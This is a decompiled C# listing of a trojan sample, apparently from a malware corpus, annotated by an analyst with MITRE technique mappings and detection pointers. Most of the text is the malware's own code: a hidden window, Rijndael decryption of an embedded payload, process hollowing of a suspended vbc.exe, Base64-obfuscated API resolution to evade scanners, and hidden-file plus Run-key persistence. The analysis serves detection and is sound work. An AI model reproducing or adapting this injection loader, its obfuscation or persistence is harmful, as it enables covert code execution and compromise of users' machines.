// Decompiled with JetBrains decompiler
// Type: Program.Main
// Assembly: Decrypting Fix, Version=6.1.7600.16385, Culture=neutral, PublicKeyToken=null
// MVID: 5EC331FA-B6C2-444A-898D-1B8B7F0DD4AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.bvqp-82e6872a62164069321f9add60821c490a425ee1ff065a7296986c3fb2473a9f.exe
//
// ANALYST NOTES (added during review; the code below is unchanged apart from layout and comments)
// -----------------------------------------------------------------------------------------------
// This listing is a decompiled malware sample, not a buildable project. Treat it as evidence.
//
// Behaviour visible in this file:
//   1. An invisible 1x1 WinForms window is created only to get a Load event (no UI is shown).
//   2. An embedded resource is decrypted with a hard-coded Rijndael key/IV (qcY2cSqjQOEnNyB8BR).
//   3. The decrypted bytes are treated as a PE image and written into a newly created, suspended
//      vbc.exe process (qod7iE7xbZivMdsc27FyN). This matches the process-hollowing pattern
//      (MITRE ATT&CK T1055.012).
//   4. The executable copies itself to the CommonApplicationData folder as "Sys32c.exe", registers
//      an HKCU Run value named "DefaultSystem" (T1547.001) and marks the copy read-only + hidden
//      (T1564.001).
//   5. API names, the host path and the registry path are Base64-encoded and resolved at run time
//      through LoadLibrary/GetProcAddress, so they do not appear as plain strings or in the
//      P/Invoke metadata (T1027).
//
// Detection / hunting pointers derived from the constants in this file:
//   - File:     <CommonApplicationData>\Sys32c.exe with Hidden and ReadOnly attributes.
//   - Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value "DefaultSystem".
//   - Process:  C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe started by a non-compiler
//               parent with no compiler arguments; process-tampering telemetry
//               (e.g. Sysmon Event ID 25) on that child.
//   - Static:   the Base64 literals and the 16-byte key/IV arrays below are stable string/byte
//               patterns for YARA-style rules.
//
// NOTE(review): the assembly version string equals the Windows 7 RTM build number; presumably
// chosen so that file properties resemble an OS component - not verifiable from this listing.
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32.SafeHandles;
using My;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;

namespace Program
{
  public class Main : Form
  {
    private IContainer Components;
    // Not referenced by any code in this listing; the DllImport attributes use the literal.
    private const string q4VJ3UxL2Hj9tVz2wT = "kernel32";

    // Entry point: runs the message loop on the hidden form so that Main_Load fires once.
    [STAThread]
    public static void Main() => Application.Run((Form) new Program.Main());

    // Builds a window the user cannot see: 1x1 client area, fully transparent, and absent
    // from the taskbar. Its only purpose in this file is to trigger Main_Load.
    public Main()
    {
      this.Load += new EventHandler(this.Main_Load);
      Application.EnableVisualStyles();
      this.InitializeComponent();
      this.SuspendLayout();
      this.AutoScaleDimensions = new SizeF(6f, 13f);
      this.AutoScaleMode = AutoScaleMode.Font;
      this.ClientSize = new Size(1, 1);
      this.Opacity = 0.0;
      this.ShowInTaskbar = false;
      this.Name = nameof (Main);
      this.Text = nameof (Main);
      this.ResumeLayout(false);
      this.PerformLayout();
    }

    // Standard WinForms disposal of the component container.
    protected override void Dispose(bool Disposing)
    {
      if (Disposing && this.Components != null)
        this.Components.Dispose();
      base.Dispose(Disposing);
    }

    // Empty: the form has no designer-generated controls.
    [DebuggerStepThrough]
    private void InitializeComponent()
    {
    }

    // The only two kernel32 imports that appear in the assembly's P/Invoke metadata.
    // Every other native API is reached through them at run time, which keeps the
    // injection-related API names out of the import information seen by static scanners.
    [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true, BestFitMapping = false)]
    public static extern Program.Main.qRTN9lUpullIj6GUh LoadLibrary(string qRTN9lUpullIj6GUh);

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(
      Program.Main.qRTN9lUpullIj6GUh qhEbZGm2H8ZnH42HR,
      string qCLRHRrHOXv2JxQNyFE);

    // Resolves an export (second argument) from a module (first argument) and wraps the
    // function pointer in a delegate of type T.
    // NOTE(review): T is used but no type-parameter list is present, here or at the call
    // sites; it looks as if the angle-bracket generics were lost when this listing was
    // extracted. As printed, this member does not compile.
    public T q2wRmsfiDJ8WoDorwrT(string qRgQq5TmqXow75lyuU, string qTt3E6FjNzOQO1IVq54z) => (T) Marshal.GetDelegateForFunctionPointer(Program.Main.GetProcAddress(Program.Main.LoadLibrary(qRgQq5TmqXow75lyuU), qTt3E6FjNzOQO1IVq54z), typeof (T));

    // Injection routine. First parameter: byte image that is parsed as a 32-bit PE file.
    // Second parameter: command line of the host process to start.
    // Returns true unless an exception was thrown; it does NOT report whether the individual
    // native calls succeeded (their results are stored in unused locals).
    //
    // Observable native call order, useful for API-sequence or EDR behavioural rules:
    //   CreateProcessA -> GetThreadContext -> ReadProcessMemory -> ZwUnmapViewOfSection ->
    //   VirtualAllocEx -> WriteProcessMemory (headers, each section, image base field) ->
    //   SetThreadContext -> ResumeThread
    public bool qod7iE7xbZivMdsc27FyN(byte[] qutBjatOQGsHGrnZrJMh, string qOgUFl9aN9Ozcfheoo)
    {
      // Base64 literals decode as: "a2VybmVsMzI=" -> kernel32, "bnRkbGw=" -> ntdll.
      // "Q3JlYXRlUHJvY2Vzc0E=" -> CreateProcessA
      Program.Main.qK5eLdqzmCYTmerrjty k5eLdqzmCyTmerrjty = this.q2wRmsfiDJ8WoDorwrT(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
      // "R2V0VGhyZWFkQ29udGV4dA==" -> GetThreadContext
      Program.Main.qpu7UEEIb1NNCzbBPjE qpu7UeeIb1NnCzbBpjE = this.q2wRmsfiDJ8WoDorwrT(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
      // "UmVhZFByb2Nlc3NNZW1vcnk=" -> ReadProcessMemory
      Program.Main.qVK7EbJcVZNQviBk2nD vk7EbJcVznQviBk2nD = this.q2wRmsfiDJ8WoDorwrT(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
      // "VmlydHVhbEFsbG9jRXg=" -> VirtualAllocEx
      Program.Main.qyuBnubPQitzQwFVMpH1 bnubPqitzQwFvMpH1 = this.q2wRmsfiDJ8WoDorwrT(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
      // "V3JpdGVQcm9jZXNzTWVtb3J5" -> WriteProcessMemory
      Program.Main.q1FykcnusJynatl87SgQ fykcnusJynatl87SgQ = this.q2wRmsfiDJ8WoDorwrT(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
      // "U2V0VGhyZWFkQ29udGV4dA==" -> SetThreadContext
      Program.Main.qyLl34wgTMSMCFLkuoX ll34wgTmsmcfLkuoX = this.q2wRmsfiDJ8WoDorwrT(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
      // "UmVzdW1lVGhyZWFk" -> ResumeThread
      Program.Main.qjgLmnnKy8isUYejVoUfc lmnnKy8isUyejVoUfc = this.q2wRmsfiDJ8WoDorwrT(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
      // "WndVbm1hcFZpZXdPZlNlY3Rpb24=" -> ZwUnmapViewOfSection (from ntdll)
      Program.Main.qGrlH13erjwuO8Ium8y1t h13erjwuO8Ium8y1t = this.q2wRmsfiDJ8WoDorwrT(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
      bool flag;
      try
      {
        IntPtr zero1 = IntPtr.Zero;
        // Raw buffers stand in for native structs so that no struct declarations appear in
        // the assembly: 4 pointers are passed where CreateProcessA writes its process
        // information, and 68 zeroed bytes where it reads its startup information.
        IntPtr[] qIadr6hocYeSQqHaF = new IntPtr[4];
        byte[] qmnfIw7BIwOHrrKSmLdoW = new byte[68];
        // PE header parsing straight from the byte image. No bounds or signature checks are
        // performed; a malformed image ends in the catch block below.
        // Offset 60 is the DOS header field that locates the NT headers.
        int int32_1 = BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, 60);
        // +6: section count.
        int int16 = (int) BitConverter.ToInt16(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 6));
        // +84: size of the header region (32-bit optional-header layout).
        IntPtr qt3C7UZF1LBmvmLls5cK = new IntPtr(BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 84)));
        // Creation flag 4 is CREATE_SUSPENDED: the host is started but its main thread does
        // not run yet. The application name is null, so the second argument is the full
        // command line.
        if (k5eLdqzmCyTmerrjty((string) null, new StringBuilder(qOgUFl9aN9Ozcfheoo), zero1, zero1, false, 4, zero1, (string) null, qmnfIw7BIwOHrrKSmLdoW, qIadr6hocYeSQqHaF))
        {
          // 179 * 4 = 716 bytes, the size of the 32-bit x86 thread CONTEXT; element 0 is
          // its ContextFlags field (65538 == 0x10002, the integer-register set).
          // This fixes the technique to 32-bit host processes.
          uint[] numArray1 = new uint[179];
          numArray1[0] = 65538U;
          // Index [1] of the process-information buffer is the main-thread handle,
          // index [0] the process handle.
          if (qpu7UeeIb1NnCzbBpjE(qIadr6hocYeSQqHaF[1], numArray1))
          {
            // Element 41 is byte offset 164 of the context (Ebx on x86). The code reads
            // 4 bytes at that value + 8 in the child and uses the result as the base of
            // the mapping to remove.
            IntPtr qkD4wxFJEaTcgyH8vkU = new IntPtr(checked ((long) numArray1[41] + 8L));
            IntPtr zero2 = IntPtr.Zero;
            IntPtr qP117M8hA2NaWe7f77D = new IntPtr(4);
            IntPtr zero3 = IntPtr.Zero;
            // Continue only if the read succeeded and the unmap returned status 0.
            if (vk7EbJcVznQviBk2nD(qIadr6hocYeSQqHaF[0], qkD4wxFJEaTcgyH8vkU, ref zero2, (int) qP117M8hA2NaWe7f77D, ref zero3) && h13erjwuO8Ium8y1t(qIadr6hocYeSQqHaF[0], zero2) == 0U)
            {
              // +52: preferred image base, +80: image size (32-bit optional-header layout).
              IntPtr num1 = new IntPtr(BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 52)));
              IntPtr num2 = new IntPtr(BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 80)));
              // 12288 == 0x3000 (MEM_COMMIT | MEM_RESERVE); 64 == 0x40 (PAGE_EXECUTE_READWRITE).
              // A remote read-write-execute allocation of a whole image is a strong
              // behavioural indicator on its own.
              // NOTE(review): the returned address is not checked for zero before use.
              IntPtr qjPIGVcpPXDEKLJbthX = bnubPqitzQwFvMpH1(qIadr6hocYeSQqHaF[0], num1, num2, 12288, 64);
              int int32_2 = qjPIGVcpPXDEKLJbthX.ToInt32();
              // NOTE(review): this local is passed by value while unassigned, which would
              // not compile; presumably an out/ref parameter that the decompiler flattened.
              int qILqBydH6XFqpsca2ULHe;
              // Header region is written first; the boolean result is discarded.
              int num3 = fykcnusJynatl87SgQ(qIadr6hocYeSQqHaF[0], qjPIGVcpPXDEKLJbthX, qutBjatOQGsHGrnZrJMh, checked ((uint) (int) qt3C7UZF1LBmvmLls5cK), qILqBydH6XFqpsca2ULHe) ? 1 : 0;
              int num4 = checked (int16 - 1);
              int num5 = 0;
              // One iteration per section header. The table is read at NT-header offset 248
              // with 40-byte entries, again matching the 32-bit PE layout.
              while (num5 <= num4)
              {
                // The 40-byte header is viewed as ten ints: [3] is the section's virtual
                // address, [4] its raw size and [5] its raw file offset.
                int[] dst = new int[10];
                Buffer.BlockCopy((Array) qutBjatOQGsHGrnZrJMh, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
                byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
                Buffer.BlockCopy((Array) qutBjatOQGsHGrnZrJMh, dst[5], (Array) numArray2, 0, numArray2.Length);
                num2 = new IntPtr(checked (int32_2 + dst[3]));
                num1 = new IntPtr(numArray2.Length);
                int num6 = fykcnusJynatl87SgQ(qIadr6hocYeSQqHaF[0], num2, numArray2, checked ((uint) (int) num1), qILqBydH6XFqpsca2ULHe) ? 1 : 0;
                checked { ++num5; }
              }
              // The 4-byte field that was read earlier is overwritten with the new base.
              num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
              num1 = new IntPtr(4);
              int num7 = fykcnusJynatl87SgQ(qIadr6hocYeSQqHaF[0], num2, BitConverter.GetBytes(qjPIGVcpPXDEKLJbthX.ToInt32()), checked ((uint) (int) num1), qILqBydH6XFqpsca2ULHe) ? 1 : 0;
              // Element 44 is byte offset 176 of the context (Eax on x86); it is set to
              // new base + the image's entry-point RVA (NT-header offset 40) and the
              // modified context is applied to the suspended thread.
              numArray1[44] = checked ((uint) (qjPIGVcpPXDEKLJbthX.ToInt32() + BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, int32_1 + 40)));
              int num8 = ll34wgTmsmcfLkuoX(qIadr6hocYeSQqHaF[1], numArray1) ? 1 : 0;
            }
          }
          // The thread is resumed whenever process creation succeeded, even if the steps
          // above failed. Triage implication: an unmodified vbc.exe child can still be
          // left behind by this sample.
          int num = (int) lmnnKy8isUyejVoUfc(qIadr6hocYeSQqHaF[1]);
        }
      }
      catch (Exception ex)
      {
        // VB.NET-style error bookkeeping; every failure is swallowed and reported as false.
        ProjectData.SetProjectError(ex);
        flag = false;
        ProjectData.ClearProjectError();
        goto label_11;
      }
      flag = true;
label_11:
      return flag;
    }

    // Form Load handler: decrypts the embedded payload, runs the injection routine against
    // vbc.exe, installs persistence once, then closes the hidden window.
    private void Main_Load(object sender, EventArgs e)
    {
      // The result of this lookup is discarded; the resource is fetched again below.
      RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject("qPEldicfv5EC3Gb8WccKM"));
      // Host path literal decodes to: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      // (a 32-bit, Microsoft-signed .NET Framework binary). The return value is ignored.
      this.qod7iE7xbZivMdsc27FyN(this.qcY2cSqjQOEnNyB8BR(My.Resources.Resources.qPEldicfv5EC3Gb8WccKM), Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XHZiYy5leGU=")));
      try
      {
        // Persistence target: <CommonApplicationData>\Sys32c.exe
        string str = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + "\\Sys32c.exe";
        // The file's existence is the only "already installed" marker, so the Run value is
        // not re-created if the file remains but the registry entry was removed.
        // Remediation should therefore remove both artefacts.
        if (!MyProject.Computer.FileSystem.FileExists(str))
        {
          MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, str);
          // Key literal decodes to:
          //   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
          // Value name "DefaultSystem", data = path of the copied executable.
          // Per-user autostart: no elevation is needed to write it.
          MyProject.Computer.Registry.SetValue(Encoding.UTF8.GetString(Convert.FromBase64String("SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu")), "DefaultSystem", (object) str);
          // Read-only + hidden attributes keep the copy out of default Explorer views.
          FileInfo fileInfo = MyProject.Computer.FileSystem.GetFileInfo(str);
          fileInfo.IsReadOnly = true;
          fileInfo.Attributes |= FileAttributes.Hidden;
        }
      }
      catch (Exception ex)
      {
        // Persistence failures are silently ignored.
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
      this.Close();
    }

    // Decrypts the embedded payload with Rijndael and returns the plaintext bytes.
    // The 16-byte key selects a 128-bit key size; Mode and Padding are not set, so the
    // framework defaults (CBC, PKCS7) apply. Key and IV are hard-coded, and the key is the
    // IV byte sequence reversed, so the payload can be recovered offline from the resource
    // named "qPEldicfv5EC3Gb8WccKM" without executing the sample.
    public byte[] qcY2cSqjQOEnNyB8BR(byte[] qVwWsMfhGAWEi5KvwpG)
    {
      using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
      {
        rijndaelManaged.IV = new byte[16] { (byte) 171, (byte) 242, (byte) 129, (byte) 120, (byte) 87, (byte) 84, (byte) 55, (byte) 143, (byte) 127, (byte) 97, (byte) 129, (byte) 71, (byte) 232, (byte) 183, (byte) 126, (byte) 29 };
        rijndaelManaged.Key = new byte[16] { (byte) 29, (byte) 126, (byte) 183, (byte) 232, (byte) 71, (byte) 129, (byte) 97, (byte) 127, (byte) 143, (byte) 55, (byte) 84, (byte) 87, (byte) 120, (byte) 129, (byte) 242, (byte) 171 };
        return rijndaelManaged.CreateDecryptor().TransformFinalBlock(qVwWsMfhGAWEi5KvwpG, 0, qVwWsMfhGAWEi5KvwpG.Length);
      }
    }

    // SafeHandle wrapper for the module handle returned by LoadLibrary; releasing it calls
    // FreeLibrary.
    public sealed class qRTN9lUpullIj6GUh : SafeHandleZeroOrMinusOneIsInvalid
    {
      private qRTN9lUpullIj6GUh()
        : base(true)
      {
      }

      protected override bool ReleaseHandle() => Program.Main.qSuwkqfclcYh5UpnG.FreeLibrary(this.handle);
    }

    // Delegate types for the dynamically resolved APIs. The mapping below follows the
    // assignments at the top of qod7iE7xbZivMdsc27FyN. Structures are passed as raw arrays
    // (byte[], IntPtr[], uint[]) rather than declared structs.

    // CreateProcessA
    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool qK5eLdqzmCYTmerrjty(
      string qRgQq5TmqXow75lyuU,
      StringBuilder qbcEbU7rMvcsrxe3UfH,
      IntPtr qTt3E6FjNzOQO1IVq54z,
      IntPtr qR7zirBJB9tbtFlemR3Z,
      [MarshalAs(UnmanagedType.Bool)] bool qhi7j6CyTUe8Si7lI9Xn,
      int q6ENwac4IZbZencEv,
      IntPtr qBskTdk7zX6JqTmKRbVVl,
      string quP1X9oZ6fCT6IaPiDYa1,
      byte[] qmnfIw7BIwOHrrKSmLdoW,
      IntPtr[] qIadr6hocYeSQqHaF);

    // WriteProcessMemory
    // NOTE(review): the last parameter is a plain int here; see the note at the call site.
    public delegate bool q1FykcnusJynatl87SgQ(
      IntPtr qYHiiijjxQIiXT9rTD,
      IntPtr qjPIGVcpPXDEKLJbthX,
      byte[] qJfIPq6CUMbtHKrLIs,
      uint qt3C7UZF1LBmvmLls5cK,
      int qILqBydH6XFqpsca2ULHe);

    // ReadProcessMemory
    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool qVK7EbJcVZNQviBk2nD(
      IntPtr qS5ZIQwRANdTpNyTLP,
      IntPtr qkD4wxFJEaTcgyH8vkU,
      ref IntPtr qDRGjGAgqVI9O6nt8qQ,
      int qP117M8hA2NaWe7f77D,
      ref IntPtr qgQuF44s6nNhK76J6F);

    // VirtualAllocEx
    public delegate IntPtr qyuBnubPQitzQwFVMpH1(
      IntPtr qgKtQSSPpjGZPbYLXHg,
      IntPtr qJpnTY3YBIic8GBgswb,
      IntPtr qsAYUzRMLvVLHofKIQNfy,
      int q1Bew5H1CpIKvMeM6Dl,
      int q3avwBWdX7hBcVtlx);

    // ZwUnmapViewOfSection
    public delegate uint qGrlH13erjwuO8Ium8y1t(
      IntPtr q8baWCaFMTPwgN6SK4,
      IntPtr qws4HXjQQZ6vytG9ZhF);

    // ResumeThread
    public delegate uint qjgLmnnKy8isUYejVoUfc(IntPtr qZBkmqcsDu7ALWuxFsaR);

    // GetThreadContext
    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool qpu7UEEIb1NNCzbBPjE(
      IntPtr q8aJbsdB3RE7K3IemC,
      uint[] qgwTtKHdkZrSrwWXUf7YC);

    // SetThreadContext
    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool qyLl34wgTMSMCFLkuoX(
      IntPtr q7eGeMCDidTxqOaWBt,
      uint[] qmYWjBfxHvovyYUEQNEph);

    // Holder for the FreeLibrary import used by the SafeHandle wrapper above.
    public sealed class qSuwkqfclcYh5UpnG
    {
      // Not referenced by any code in this listing; the DllImport attribute uses the literal.
      private const string qyZwDbaHtRhHvobT4Jwdt = "kernel32";

      [ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)]
      [DllImport("kernel32", SetLastError = true)]
      [return: MarshalAs(UnmanagedType.Bool)]
      public static extern bool FreeLibrary(IntPtr qqI56ettNvDsxSFeCqpVt);
    }
  }
}